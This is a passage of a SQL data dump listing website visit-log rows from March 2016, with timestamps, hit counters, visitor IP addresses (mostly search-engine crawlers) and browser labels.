223','other'),(15950,1457368351,1,1,0,0,'5.255.253.30','other'),(15951,1457368442,4,4,0,0,'178.154.189.204','other'),(15952,1457368480,1,1,0,0,'207.46.13.43','other'),(15953,1457368552,1,1,0,0,'217.69.136.206','other'),(15954,1457368553,1,1,0,0,'217.69.136.208','other'),(15955,1457368558,1,1,0,0,'94.179.121.108','chrome'),(15956,1457369111,1,1,0,0,'66.249.92.99','other'),(15957,1457369150,1,0,1,0,'68.180.229.232',''),(15958,1457369175,12,0,12,0,'66.249.66.158',''),(15959,1457369376,1,1,0,0,'66.249.66.129','other'),(15960,1457369455,4,0,4,0,'66.249.66.162',''),(15961,1457369544,1,1,0,0,'37.187.94.41','other'),(15962,1457369583,1,0,1,0,'66.249.66.166',''),(15963,1457369811,13,1,12,0,'66.249.66.158',''),(15964,1457369892,2,2,0,0,'66.249.66.133','other'),(15965,1457370101,21,1,20,0,'66.249.66.158',''),(15966,1457370137,2,2,0,0,'66.249.66.190','other'),(15967,1457370471,163,163,0,0,'94.154.239.69','other'),(15968,1457370512,1,1,0,0,'141.8.183.14','other'),(15969,1457370513,5,5,0,0,'178.154.149.11','other'),(15970,1457370514,7,7,0,0,'93.158.152.9','other'),(15971,1457370516,5,5,0,0,'5.255.253.53','other'),(15972,1457370552,3,1,2,0,'66.249.66.158',''),(15973,1457370571,9,1,8,0,'66.249.66.158',''),(15975,1457370713,6,1,5,0,'66.249.66.158',''),(15976,1457370795,2,1,1,0,'66.249.66.158',''),(15977,1457370806,1,1,0,0,'217.69.133.228','other'),(15978,1457370811,6,6,0,0,'66.249.66.158','other'),(15979,1457371325,1,1,0,0,'217.69.133.67','other'),(15980,1457371326,1,1,0,0,'66.249.66.166','other'),(15981,1457371353,1,1,0,0,'46.55.23.55','chrome'),(15982,1457371364,1,1,0,0,'66.249.66.162','other'),(15983,1457371804,1,0,1,0,'68.180.229.232',''),(15984,1457371846,1,1,0,0,'37.187.94.34','other'),(15985,1457371884,1,1,0,0,'217.69.133.222','other'),(15986,1457372027,1,1,0,0,'217.69.133.224','other'),(15987,1457372052,4,1,3,0,'66.249.66.158',''),(15988,1457372082,1,1,0,0,'217.69.143.45','other'),(15989,1457372152,1,1,0,0,'141.8.184.18','other'),(15990,1457372153,1,1,0,0,'93.158.152.9','other'),(15991,1457372154,1,1,0,0,'141.8.183.14','other'),(15992,1457372218,1,1,0,0,'217.69.133.84','other'),(15993,1457372279,1,0,1,0,'66.249.66.162',''),(15994,1457372290,1,0,1,0,'66.249.66.166',''),(15995,1457372296,1,1,0,0,'8.29.198.26','other'),(15996,1457372341,4,2,2,0,'66.249.66.158',''),(15997,1457372387,2,0,2,0,'66.249.66.133',''),(15998,1457372567,3,1,2,0,'66.249.66.166',''),(15999,1457372648,2,2,0,0,'66.249.66.162','other'),(16000,1457372784,2,0,2,0,'68.180.229.232',''),(16001,1457373099,1,1,0,0,'217.69.136.210','other'),(16002,1457373167,1,1,0,0,'217.69.143.49','other'),(16003,1457373413,1,0,1,0,'66.249.66.190',''),(16004,1457373508,1,0,1,0,'66.249.66.158',''),(16005,1457373589,2,2,0,0,'178.154.149.11','other'),(16007,1457373590,2,2,0,0,'141.8.183.14','other'),(16008,1457373591,2,2,0,0,'141.8.184.18','other'),(16009,1457373592,2,2,0,0,'93.158.152.9','other'),(16010,1457373596,1,1,0,0,'130.193.37.21','other'),(16011,1457373975,1,1,0,0,'91.196.178.168','firefox'),(16012,1457374638,1,1,0,0,'37.9.122.203','other'),(16013,1457374641,1,1,0,0,'178.154.189.204','other'),(16014,1457375135,1,1,0,0,'101.226.168.198','chrome'),(16015,1457375406,1,1,0,0,'46.55.23.55','chrome'),(16016,1457375433,2,0,2,0,'66.249.66.158',''),(16017,1457375674,1,1,0,0,'91.196.178.70','chrome'),(16018,1457376041,2,1,1,0,'66.249.66.166',''),(16019,1457376262,1,1,0,0,'217.69.143.59','other'),(16020,1457376357,1,0,1,0,'68.180.229.232',''),(16021,1457376708,1,1,0,0,'37.187.94.137','other'),(16022,1457376772,6,0,6,0,'66.249.66.162',''),(16023,1457376813,39,0,39,0,'66.249.66.158',''),(16024,1457376956,1,1,0,0,'91.196.178.70','chrome'),(16025,1457376989,1,1,0,0,'93.158.152.9','other'),(16027,1457376991,2,2,0,0,'141.8.184.11','other'),(16029,1457376992,1,1,0,0,'5.255.253.30','other'),(16031,1457376993,1,1,0,0,'178.154.149.11','other'),(16032,1457376994,1,1,0,0,'5.255.253.100','other'),(16033,1457376996,1,1,0,0,'141.8.132.97','other'),(16034,1457376997,1,1,0,0,'141.8.142.88','other'),(16035,1457377511,1,1,0,0,'51.255.65.67','other'),(16036,1457377549,1,1,0,0,'37.187.95.16','other'),(16037,1457377718,46,0,46,0,'66.249.66.158',''),(16038,1457377760,1,1,0,0,'217.69.133.69','other'),(16039,1457377889,1,0,1,0,'66.249.66.162',''),(16040,1457378498,1,0,1,0,'68.180.229.232',''),(16041,1457378646,2,2,0,0,'91.200.12.141','chrome'),(16042,1457378652,2,2,0,0,'91.200.12.143','chrome'),(16043,1457379082,1,1,0,0,'217.69.143.60','other'),(16044,1457379189,1,1,0,0,'37.187.94.142','other'),(16045,1457379270,16,1,15,0,'66.249.66.158',''),(16046,1457379450,1,1,0,0,'66.249.92.95','other'),(16047,1457379481,1,0,1,0,'66.249.66.162',''),(16048,1457379483,1,1,0,0,'141.8.184.18','other'),(16050,1457379484,1,1,0,0,'93.158.152.26','other'),(16051,1457379485,1,1,0,0,'141.8.184.22','other'),(16052,1457379486,1,1,0,0,'5.255.253.30','other'),(16053,1457379883,1,0,1,0,'66.249.66.190',''),(16054,1457380004,1,0,1,0,'66.249.66.129',''),(16055,1457380030,1,1,0,0,'141.8.132.97','other'),(16056,1457380062,1,1,0,0,'37.187.95.63','other'),(16057,1457380065,3,0,3,0,'66.249.66.133',''),(16058,1457380086,2,0,2,0,'66.249.66.166',''),(16059,1457380182,3,3,0,0,'91.196.178.103','chrome'),(16060,1457380208,1,1,0,0,'37.187.95.126','other'),(16061,1457380490,1,1,0,0,'217.69.143.44','other'),(16062,1457380656,2,0,2,0,'66.249.66.162',''),(16063,1457380697,2,0,2,0,'66.249.66.158',''),(16064,1457380896,1,1,0,0,'95.135.91.11','other'),(16065,1457381185,3,3,0,0,'5.255.253.110','other'),(16067,1457381200,1,1,0,0,'95.133.238.77','firefox'),(16068,1457381298,4,4,0,0,'93.158.152.9','other'),(16070,1457381655,2,2,0,0,'141.8.142.41','other'),(16072,1457381659,1,1,0,0,'5.255.253.55','other'),(16073,1457381660,35,35,0,0,'141.8.184.18','other'),(16074,1457381661,3,3,0,0,'5.255.253.100','other'),(16075,1457381667,2,2,0,0,'5.255.253.9','other'),(16076,1457381668,1,1,0,0,'141.8.132.79','other'),(16077,1457381670,37,37,0,0,'178.154.149.11','other'),(16078,1457381671,1,1,0,0,'141.8.132.74','other'),(16079,1457381675,2,2,0,0,'141.8.142.10','other'),(16081,1457381681,2,2,0,0,'5.255.253.30','other'),(16082,1457381684,1,1,0,0,'141.8.132.99','other'),(16083,1457381685,1,1,0,0,'130.193.51.43','other'),(16084,1457381686,3,3,0,0,'141.8.132.2','other'),(16085,1457381712,1,1,0,0,'217.69.133.232','other'),(16086,1457381743,2,2,0,0,'141.8.184.22','other'),(16087,1457381744,1,1,0,0,'141.8.142.88','other'),(16088,1457381758,2,2,0,0,'141.8.184.11','other'),(16089,1457381762,2,2,0,0,'130.193.51.85','other'),(16090,1457381763,1,1,0,0,'130.193.37.21','other'),(16091,1457381764,1,1,0,0,'141.8.142.82','other'),(16092,1457381765,1,1,0,0,'130.193.51.81','other'),(16093,1457381766,1,1,0,0,'141.8.132.97','other'),(16094,1457381768,1,1,0,0,'141.8.132.76','other'),(16095,1457381771,1,1,0,0,'5.255.253.10','other'),(16096,1457381778,4,4,0,0,'5.255.253.53','other'),(16097,1457382001,1,0,1,0,'66.249.66.158',''),(16098,1457382173,18,18,0,0,'141.8.183.14','other'),(16099,1457382244,1,1,0,0,'93.158.152.9','other'),(16100,1457382298,4,4,0,0,'62.210.148.246','other'),(16101,1457382415,1,0,1,0,'66.249.66.166',''),(16102,1457382503,3,0,3,0,'66.249.66.162',''),(16103,1457383108,1,0,1,0,'66.249.66.158',''),(16104,1457383120,1,1,0,0,'8.29.198.25','other'),(16105,1457383200,1,1,0,0,'217.69.143.47','other'),(16106,1457383655,3,0,3,0,'66.249.66.162',''),(16107,1457383720,1,1,0,0,'188.166.0.157','other'),(16108,1457384016,1,1,0,0,'217.69.133.227','other'),(16109,1457384017,1,1,0,0,'217.69.133.69','other'),(16110,1457384035,1,1,0,0,'217.69.133.239','other'),(16111,1457384036,1,1,0,0,'217.69.133.70','other'),(16112,1457384173,1,1,0,0,'217.69.143.50','other'),(16113,1457384244,7,7,0,0,'178.154.149.11','other'),(16115,1457384246,7,7,0,0,'141.8.184.18','other'),(16116,1457384256,3,0,3,0,'66.249.66.158',''),(16117,1457384340,3,3,0,0,'141.8.183.14','other'),(16118,1457384366,1,1,0,0,'95.135.91.11','other'),(16119,1457384805,2,0,2,0,'66.249.66.166',''),(16120,1457384869,1,1,0,0,'96.44.141.19','msie'),(16121,1457385307,3,0,3,0,'66.249.66.158',''),(16122,1457385401,1,1,0,0,'217.69.133.233','other'),(16123,1457386141,2,2,0,0,'141.8.184.18','other'),(16124,1457386142,3,3,0,0,'93.158.152.9','other'),(16126,1457386144,1,1,0,0,'178.154.149.11','other'),(16127,1457386310,1,1,0,0,'141.8.132.2','other'),(16128,1457386311,1,1,0,0,'141.8.184.11','other'),(16130,1457386312,1,1,0,0,'141.8.132.99','other'),(16131,1457386313,1,1,0,0,'130.193.51.43','other'),(16132,1457386314,1,1,0,0,'93.158.152.26','other'),(16133,1457386315,1,1,0,0,'5.255.253.9','other'),(16135,1457386316,1,1,0,0,'5.255.253.100','other'),(16136,1457386448,2,0,2,0,'66.249.66.158',''),(16137,1457386646,1,0,1,0,'66.249.66.129',''),(16138,1457386669,1,0,1,0,'66.249.66.162',''),(16139,1457386878,3,2,1,0,'66.249.66.166',''),(16140,1457387511,1,1,0,0,'51.255.65.56','other'),(16141,1457388065,1,0,1,0,'66.249.66.162',''),(16142,1457388151,1,1,0,0,'217.69.143.67','other'),(16143,1457388164,1,1,0,0,'130.193.51.81','other'),(16145,1457388165,1,1,0,0,'141.8.132.79','other'),(16146,1457388166,2,2,0,0,'5.255.253.51','other'),(16147,1457388167,1,1,0,0,'141.8.142.88','other'),(16148,1457388168,2,2,0,0,'5.255.253.53','other'),(16150,1457388169,1,1,0,0,'141.8.184.18','other'),(16151,1457388170,1,1,0,0,'93.158.152.9','other'),(16152,1457388171,1,1,0,0,'178.154.149.11','other'),(16153,1457388172,1,1,0,0,'5.255.253.30','other'),(16154,1457388173,2,2,0,0,'130.193.37.27','other'),(16155,1457388175,1,1,0,0,'141.8.142.55','other'),(16157,1457388176,1,1,0,0,'5.255.253.103','other'),(16158,1457388177,1,1,0,0,'141.8.132.66','other'),(16159,1457388178,1,1,0,0,'141.8.132.2','other'),(16161,1457388179,1,1,0,0,'130.193.51.102','other'),(16162,1457388181,1,1,0,0,'5.255.253.94','other'),(16163,1457388182,1,1,0,0,'141.8.132.109','other'),(16164,1457388355,3,2,1,0,'66.249.66.162',''),(16165,1457388396,60,60,0,0,'89.163.148.58','other'),(16166,1457388513,4,0,4,0,'66.249.66.158',''),(16167,1457388669,1,1,0,0,'51.255.65.63','other'),(16168,1457388915,1,0,1,0,'66.249.66.190',''),(16169,1457388998,1,0,1,0,'66.249.66.166',''),(16170,1457389203,1,1,0,0,'207.46.13.185','other'),(16171,1457389345,1,1,0,0,'207.46.13.43','other'),(16172,1457389981,1,1,0,0,'66.249.92.95','other'),(16173,1457390501,1,1,0,0,'217.69.133.240','other'),(16174,1457390519,1,1,0,0,'37.187.94.177','other'),(16175,1457390523,1,1,0,0,'217.69.136.209','other'),(16176,1457390532,1,1,0,0,'217.69.133.69','other'),(16177,1457390590,1,1,0,0,'64.246.165.50','firefox'),(16178,1457390645,1,1,0,0,'37.187.94.65','other'),(16179,1457390929,1,1,0,0,'217.69.133.68','other'),(16180,1457391072,1,1,0,0,'51.255.65.32','other'),(16181,1457391127,3,0,3,0,'66.249.66.129',''),(16182,1457391419,1,1,0,0,'5.255.253.94','other'),(16184,1457391420,1,1,0,0,'141.8.184.31','other'),(16185,1457391421,1,1,0,0,'141.8.142.60','other'),(16187,1457391422,1,1,0,0,'130.193.50.22','other'),(16188,1457391423,1,1,0,0,'141.8.184.6','other'),(16190,1457391424,1,1,0,0,'141.8.132.66','other'),(16191,1457391425,1,1,0,0,'130.193.51.22','other'),(16192,1457391426,1,1,0,0,'130.193.51.109','other'),(16194,1457391430,1,1,0,0,'130.193.51.50','other'),(16195,1457391431,1,1,0,0,'213.180.206.205','other'),(16196,1457391521,3,0,3,0,'66.249.66.166',''),(16197,1457391546,1,1,0,0,'217.69.143.47','other'),(16198,1457391656,2,0,2,0,'66.249.66.158',''),(16199,1457391831,2,2,0,0,'149.202.192.112','firefox'),(16200,1457392068,2,2,0,0,'66.249.66.190','other'),(16201,1457392080,3,1,2,0,'66.249.66.162',''),(16202,1457392093,3,2,1,0,'66.249.66.158',''),(16203,1457392123,1,1,0,0,'66.249.66.133','other'),(16204,1457392154,4,3,1,0,'66.249.66.158',''),(16205,1457392201,3,3,0,0,'66.249.66.158','other'),(16206,1457392764,1,1,0,0,'31.172.191.135','chrome'),(16207,1457393072,1,1,0,0,'5.255.253.51','other'),(16209,1457393073,1,1,0,0,'5.255.253.62','other'),(16210,1457393074,1,1,0,0,'141.8.142.55','other'),(16212,1457393075,1,1,0,0,'141.8.184.31','other'),(16213,1457393076,1,1,0,0,'141.8.142.60','other'),(16215,1457393078,1,1,0,0,'141.8.132.74','other'),(16217,1457393249,2,1,1,0,'66.249.66.162',''),(16218,1457393435,1,0,1,0,'66.249.66.158',''),(16219,1457393503,1,0,1,0,'66.249.66.190',''),(16220,1457393621,2,1,1,0,'66.249.66.158',''),(16221,1457393932,1,1,0,0,'8.29.198.26','other'),(16222,1457394029,1,1,0,0,'207.46.13.171','other'),(16223,1457394338,2,0,2,0,'66.249.66.166',''),(16224,1457394605,1,1,0,0,'37.187.94.234','other'),(16225,1457394851,2,2,0,0,'77.232.164.65','chrome'),(16226,1457394888,1,1,0,0,'217.69.133.68','other'),(16227,1457395157,1,1,0,0,'207.46.13.43','other'),(16228,1457395411,1,1,0,0,'5.255.253.51','other'),(16230,1457395412,1,1,0,0,'141.8.142.60','other'),(16232,1457395413,1,1,0,0,'141.8.184.6','other'),(16233,1457395414,1,1,0,0,'93.158.152.65','other'),(16234,1457395415,1,1,0,0,'5.255.253.89','other'),(16236,1457395417,1,1,0,0,'130.193.51.50','other'),(16238,1457395895,2,0,2,0,'66.249.66.166',''),(16239,1457396105,3,2,1,0,'66.249.66.158',''),(16240,1457396227,1,1,0,0,'66.249.66.162','other'),(16241,1457396261,1,1,0,0,'217.69.133.216','other'),(16242,1457396329,1,1,0,0,'37.187.95.182','other'),(16243,1457396720,1,1,0,0,'37.187.94.41','other'),(16244,1457396791,1,1,0,0,'217.69.143.63','other'),(16245,1457396838,1,1,0,0,'217.69.143.58','other'),(16246,1457396986,1,0,1,0,'66.249.66.166',''),(16247,1457397304,1,0,1,0,'66.249.66.162',''),(16248,1457397464,1,1,0,0,'37.187.95.189','other'),(16249,1457397743,1,1,0,0,'217.69.133.69','other'),(16250,1457397999,2,0,2,0,'66.249.66.166',''),(16251,1457398118,1,1,0,0,'217.69.143.62','other'),(16252,1457398148,1,1,0,0,'217.69.143.53','other'),(16253,1457398221,2,2,0,0,'141.8.142.88','other'),(16254,1457398225,1,1,0,0,'130.193.51.45','other'),(16255,1457398229,1,1,0,0,'5.255.253.79','other'),(16256,1457398233,1,1,0,0,'178.154.189.12','other'),(16257,1457398237,1,1,0,0,'5.255.253.51','other'),(16258,1457398289,1,1,0,0,'141.8.142.8','other'),(16259,1457398293,1,1,0,0,'5.255.253.10','other'),(16260,1457398297,1,1,0,0,'141.8.132.76','other'),(16261,1457398614,1,0,1,0,'68.180.229.232',''),(16262,1457398645,3,0,3,0,'66.249.66.162',''),(16263,1457398657,1,1,0,0,'37.187.95.210','other'),(16264,1457398699,1,0,1,0,'66.249.66.158',''),(16265,1457398900,1,0,1,0,'66.249.66.133',''),(16266,1457399316,2,0,2,0,'66.249.66.166',''),(16267,1457399696,1,0,1,0,'66.249.66.158',''),(16268,1457399913,1,0,1,0,'66.249.66.162',''),(16269,1457400295,1,1,0,0,'5.255.253.10','other'),(16270,1457400299,1,1,0,0,'141.8.184.18','other'),(16271,1457400304,1,1,0,0,'141.8.142.88','other'),(16272,1457400308,1,1,0,0,'93.158.152.26','other'),(16273,1457400312,1,1,0,0,'178.154.149.11','other'),(16274,1457400316,1,1,0,0,'141.8.184.11','other'),(16275,1457400321,1,1,0,0,'141.8.132.79','other'),(16276,1457400325,1,1,0,0,'5.255.253.100','other'),(16277,1457400329,1,1,0,0,'5.255.253.110','other'),(16278,1457400579,3,0,3,0,'68.180.229.232',''),(16279,1457400582,2,0,2,0,'66.249.66.166',''),(16280,1457400621,1,1,0,0,'130.193.51.45','other'),(16281,1457400626,1,1,0,0,'141.8.183.14','other'),(16282,1457400630,1,1,0,0,'141.8.142.41','other'),(16283,1457400634,1,1,0,0,'141.8.184.22','other'),(16284,1457400780,1,1,0,0,'66.249.92.103','other'),(16285,1457400792,1,1,0,0,'37.9.122.201','other'),(16286,1457400795,1,1,0,0,'37.9.122.202','other'),(16287,1457400796,6,0,6,0,'66.249.66.158',''),(16288,1457400798,1,1,0,0,'178.154.189.201','other'),(16289,1457400847,1,1,0,0,'51.255.65.83','other'),(16290,1457400870,2,0,2,0,'66.249.66.162',''),(16291,1457401217,1,0,1,0,'66.249.66.129',''),(16292,1457401274,1,1,0,0,'217.69.143.56','other'),(16293,1457401306,1,1,0,0,'51.255.65.21','other'),(16294,1457401393,1,1,0,0,'62.149.0.171','other'),(16295,1457401410,1,1,0,0,'217.69.133.235','other'),(16296,1457401688,1,0,1,0,'66.249.66.166',''),(16297,1457401801,1,0,1,0,'66.249.66.162',''),(16298,1457402014,1,1,0,0,'80.82.64.109','chrome'),(16299,1457402455,1,0,1,0,'68.180.229.232',''),(16300,1457402507,1,1,0,0,'178.154.189.6','other'),(16301,1457402511,1,1,0,0,'141.8.142.55','other'),(16302,1457402515,1,1,0,0,'141.8.132.109','other'),(16303,1457402519,1,1,0,0,'141.8.184.31','other'),(16304,1457402524,1,1,0,0,'141.8.142.82','other'),(16305,1457402573,1,1,0,0,'217.69.133.237','other'),(16306,1457402789,1,1,0,0,'37.187.95.25','other'),(16307,1457403272,2,0,2,0,'66.249.66.162',''),(16308,1457403387,1,0,1,0,'66.249.66.158',''),(16309,1457403670,1,1,0,0,'217.69.143.61','other'),(16310,1457404147,1,1,0,0,'93.158.152.65','other'),(16311,1457404151,1,1,0,0,'130.193.51.55','other'),(16312,1457404306,1,1,0,0,'37.187.94.48','other'),(16313,1457404689,1,1,0,0,'217.69.133.230','other'),(16314,1457404747,3,3,0,0,'141.8.183.14','other'),(16315,1457404766,1,1,0,0,'8.29.198.25','other'),(16316,1457404974,1,1,0,0,'217.69.143.63','other'),(16317,1457405180,1,1,0,0,'217.69.133.217','other'),(16318,1457405285,1,1,0,0,'66.249.66.158','other'),(16319,1457405345,1,1,0,0,'217.69.133.239','other'),(16320,1457405477,1,1,0,0,'37.187.95.109','other'),(16321,1457405512,2,1,1,0,'66.249.66.166',''),(16322,1457405793,9,9,0,0,'207.46.13.43','other'),(16323,1457405802,6,6,0,0,'207.46.13.171','other'),(16324,1457405835,2,1,1,0,'66.249.66.190',''),(16325,1457406221,1,0,1,0,'66.249.66.162',''),(16326,1457406241,2,0,2,0,'66.249.66.158',''),(16327,1457406307,1,1,0,0,'93.158.152.9','other'),(16328,1457406324,2,2,0,0,'141.8.184.11','other'),(16329,1457406333,1,1,0,0,'5.255.253.9','other'),(16330,1457406337,2,2,0,0,'130.193.51.81','other'),(16331,1457406346,1,1,0,0,'141.8.142.88','other'),(16332,1457406352,1,1,0,0,'141.8.142.41','other'),(16333,1457406356,1,1,0,0,'130.193.37.21','other'),(16334,1457406361,1,1,0,0,'141.8.132.99','other'),(16335,1457406429,2,1,1,0,'66.249.66.166',''),(16336,1457406736,1,1,0,0,'66.249.66.158','other'),(16337,1457406969,6,6,0,0,'157.55.39.160','other'),(16338,1457407375,1,0,1,0,'66.249.66.166',''),(16339,1457407519,1,1,0,0,'51.255.65.73','other'),(16340,1457408079,3,3,0,0,'141.8.184.18','other'),(16341,1457408083,2,2,0,0,'5.255.253.53','other'),(16342,1457408091,2,2,0,0,'178.154.149.11','other'),(16343,1457408231,1,1,0,0,'217.69.133.236','other'),(16344,1457408258,1,0,1,0,'66.249.66.162',''),(16345,1457408265,3,0,3,0,'66.249.66.158',''),(16346,1457408340,1,1,0,0,'141.8.132.2','other'),(16347,1457408344,1,1,0,0,'130.193.51.81','other'),(16348,1457408349,1,1,0,0,'93.158.152.26','other'),(16349,1457408358,2,2,0,0,'130.193.51.85','other'),(16350,1457408362,1,1,0,0,'130.193.51.102','other'),(16351,1457408367,1,1,0,0,'93.158.152.9','other'),(16352,1457408375,1,1,0,0,'141.8.132.97','other'),(16353,1457408379,1,1,0,0,'130.193.51.43','other'),(16354,1457408384,1,1,0,0,'141.8.142.8','other'),(16355,1457408704,1,1,0,0,'37.187.95.71','other'),(16356,1457408764,1,1,0,0,'37.187.95.169','other'),(16357,1457409032,4,4,0,0,'141.8.183.14','other'),(16358,1457409250,1,1,0,0,'217.69.143.56','other'),(16359,1457409270,1,0,1,0,'66.249.64.177',''),(16360,1457409283,56,0,56,0,'66.249.66.158',''),(16361,1457409299,2,2,0,0,'141.8.132.2','other'),(16362,1457409304,2,2,0,0,'5.255.253.10','other'),(16363,1457409308,1,1,0,0,'141.8.142.88','other'),(16364,1457409316,3,3,0,0,'141.8.142.41','other'),(16365,1457409329,1,1,0,0,'141.8.142.10','other'),(16366,1457409345,1,1,0,0,'130.193.37.27','other'),(16367,1457409349,2,2,0,0,'141.8.142.8','other'),(16368,1457409358,2,2,0,0,'141.8.184.18','other'),(16369,1457409362,1,1,0,0,'93.158.152.9','other'),(16370,1457409366,2,2,0,0,'5.255.253.53','other'),(16371,1457409370,1,1,0,0,'130.193.37.21','other'),(16372,1457409375,2,2,0,0,'141.8.132.99','other'),(16373,1457409379,1,1,0,0,'5.255.253.100','other'),(16374,1457409383,1,1,0,0,'141.8.184.11','other'),(16375,1457409387,1,1,0,0,'141.8.184.22','other'),(16376,1457409391,2,2,0,0,'141.8.132.97','other'),(16377,1457409395,2,2,0,0,'130.193.51.102','other'),(16378,1457409400,2,2,0,0,'5.255.253.110','other'),(16379,1457409403,1,1,0,0,'5.255.253.30','other'),(16380,1457409540,1,0,1,0,'68.180.229.232',''),(16381,1457409787,1,1,0,0,'123.125.71.13','other'),(16382,1457409894,1,1,0,0,'141.8.132.79','other'),(16383,1457409964,54,2,52,0,'66.249.66.158',''),(16384,1457410019,1,1,0,0,'141.8.132.76','other'),(16385,1457410288,1,1,0,0,'51.255.65.48','other'),(16387,1457410289,2,2,0,0,'141.8.142.8','other'),(16388,1457410301,1,1,0,0,'130.193.37.21','other'),(16389,1457410303,1,1,0,0,'141.8.184.22','other'),(16390,1457410343,1,1,0,0,'130.193.51.45','other'),(16391,1457410344,1,1,0,0,'141.8.142.10','other'),(16392,1457410346,1,1,0,0,'5.255.253.9','other'),(16393,1457410575,1,1,0,0,'176.222.185.217','chrome'),(16394,1457410632,1,1,0,0,'217.69.143.62','other'),(16395,1457410740,4,4,0,0,'93.158.152.9','other'),(16396,1457410999,1,0,1,0,'66.249.66.158',''),(16397,1457411050,1,1,0,0,'66.249.92.95','other'),(16398,1457411129,2,2,0,0,'178.154.149.11','other'),(16399,1457411264,1,1,0,0,'180.76.15.9','other'),(16400,1457411272,5,5,0,0,'82.193.127.15','other'),(16401,1457411335,1,1,0,0,'217.69.143.65','other'),(16403,1457411352,3,3,0,0,'176.9.131.69','other'),(16404,1457411459,1,1,0,0,'144.76.8.132','other'),(16405,1457411500,3,3,0,0,'141.8.183.14','other'),(16406,1457411501,4,4,0,0,'141.8.184.18','other'),(16407,1457412202,1,0,1,0,'66.249.66.162',''),(16408,1457412365,1,1,0,0,'141.8.132.99','other'),(16409,1457412645,1,1,0,0,'217.69.133.237','other'),(16410,1457412746,1,1,0,0,'217.69.133.69','other'),(16411,1457412755,1,1,0,0,'130.193.37.21','other'),(16412,1457412845,1,1,0,0,'217.69.136.210','other'),(16413,1457412995,1,1,0,0,'217.69.133.70','other'),(16414,1457413172,1,1,0,0,'141.8.184.18','other'),(16415,1457413289,1,0,1,0,'66.249.66.158',''),(16416,1457413665,1,1,0,0,'141.8.183.14','other'),(16417,1457413670,2,0,2,0,'68.180.229.232',''),(16418,1457413900,3,3,0,0,'69.30.215.142','other'),(16419,1457413901,7,7,0,0,'207.46.13.185','other'),(16420,1457413918,1,1,0,0,'130.193.37.21','other'),(16421,1457414047,2,2,0,0,'80.91.162.99','other'),(16422,1457414117,1,1,0,0,'51.255.65.55','other'),(16423,1457414328,1,1,0,0,'130.193.51.102','other'),(16424,1457414772,1,1,0,0,'66.249.93.86','other'),(16425,1457414822,2,2,0,0,'130.193.51.43','other'),(16426,1457414825,1,1,0,0,'5.255.253.53','other'),(16427,1457414827,1,1,0,0,'5.255.253.103','other'),(16428,1457414828,1,1,0,0,'141.8.142.41','other'),(16429,1457414888,1,1,0,0,'141.8.132.2','other'),(16430,1457414889,1,1,0,0,'130.193.51.81','other'),(16431,1457414998,1,0,1,0,'66.249.66.162',''),(16432,1457415359,2,0,2,0,'66.249.66.166',''),(16433,1457415420,1,1,0,0,'141.8.184.18','other'),(16434,1457415571,1,1,0,0,'51.255.65.58','other'),(16435,1457415679,1,1,0,0,'37.187.94.161','other'),(16436,1457415719,1,0,1,0,'68.180.229.232',''),(16437,1457415739,1,1,0,0,'8.29.198.25','other'),(16438,1457415937,1,1,0,0,'141.8.142.8','other'),(16439,1457415941,1,1,0,0,'207.46.13.185','other'),(16440,1457415996,66,0,66,0,'66.249.66.158',''),(16441,1457416200,1,1,0,0,'130.193.51.45','other'),(16442,1457416202,1,1,0,0,'178.154.149.11','other'),(16443,1457416240,1,1,0,0,'141.8.142.41','other'),(16444,1457416245,1,1,0,0,'141.8.132.79','other'),(16445,1457416388,1,1,0,0,'37.187.94.181','other'),(16446,1457416466,1,1,0,0,'217.69.133.219','other'),(16447,1457416478,1,1,0,0,'217.69.143.57','other'),(16448,1457416479,1,1,0,0,'217.69.143.56','other'),(16449,1457416662,1,1,0,0,'51.255.65.66','other'),(16450,1457416866,1,1,0,0,'93.158.152.9','other'),(16451,1457416872,1,1,0,0,'66.249.93.90','other'),(16452,1457416971,1,1,0,0,'217.69.143.68','other'),(16453,1457417191,1,1,0,0,'51.255.65.12','other'),(16454,1457417480,1,1,0,0,'130.193.37.27','other'),(16455,1457417481,1,1,0,0,'141.8.183.14','other'),(16456,1457417670,1,0,1,0,'66.249.66.166',''),(16457,1457417678,2,0,2,0,'66.249.66.162',''),(16458,1457417687,12,0,12,0,'66.249.66.158',''),(16459,1457417801,1,1,0,0,'51.255.65.48','other'),(16460,1457418009,1,1,0,0,'5.255.253.10','other'),(16461,1457418171,1,1,0,0,'217.69.136.210','other'),(16462,1457418289,1,1,0,0,'5.255.253.9','other'),(16463,1457418290,1,1,0,0,'141.8.184.22','other'),(16465,1457418704,1,1,0,0,'5.255.253.53','other'),(16466,1457419016,1,1,0,0,'130.193.37.21','other'),(16467,1457419017,1,1,0,0,'141.8.132.48','other'),(16468,1457419149,1,0,1,0,'66.249.66.162',''),(16469,1457419160,16,0,16,0,'66.249.66.158',''),(16470,1457419376,1,0,1,0,'66.249.66.129',''),(16471,1457419439,1,0,1,0,'66.249.66.190',''),(16472,1457419724,1,1,0,0,'5.255.253.110','other'),(16473,1457419744,1,1,0,0,'51.255.65.52','other'),(16474,1457419803,1,1,0,0,'217.69.133.236','other'),(16475,1457419925,1,1,0,0,'217.69.133.69','other'),(16476,1457419926,1,1,0,0,'217.69.133.230','other'),(16477,1457420073,1,1,0,0,'37.187.95.219','other'),(16478,1457420121,5,5,0,0,'94.154.239.69','other'),(16479,1457420168,2,2,0,0,'141.8.183.14','other'),(16480,1457420456,1,1,0,0,'51.255.65.37','other'),(16481,1457420477,1,1,0,0,'66.249.93.90','other'),(16482,1457421240,1,1,0,0,'217.69.133.218','other'),(16484,1457421241,1,1,0,0,'217.69.133.217','other'),(16485,1457421335,1,1,0,0,'178.154.189.204','other'),(16486,1457421448,1,0,1,0,'66.249.66.158',''),(16487,1457421460,1,1,0,0,'5.255.253.53','other'),(16488,1457421470,1,1,0,0,'66.249.92.95','other'),(16489,1457421541,4,4,0,0,'80.91.162.99','other'),(16490,1457421778,1,1,0,0,'37.187.95.6','other'),(16491,1457421816,1,1,0,0,'217.69.133.67','other'),(16492,1457421818,1,1,0,0,'217.69.133.219','other'),(16493,1457421870,2,0,2,0,'66.249.66.166',''),(16494,1457421928,3,0,3,0,'66.249.66.162',''),(16495,1457421943,1,0,1,0,'68.180.229.232',''),(16496,1457421951,115,115,0,0,'92.236.71.145','other'),(16497,1457422145,1,1,0,0,'5.255.253.100','other'),(16498,1457422160,1,1,0,0,'141.8.132.79','other'),(16500,1457422164,1,1,0,0,'93.158.152.26','other'),(16501,1457422168,1,1,0,0,'5.255.253.55','other'),(16502,1457422169,1,1,0,0,'141.8.142.8','other'),(16503,1457422171,1,1,0,0,'130.193.51.55','other'),(16505,1457422199,1,1,0,0,'217.69.133.235'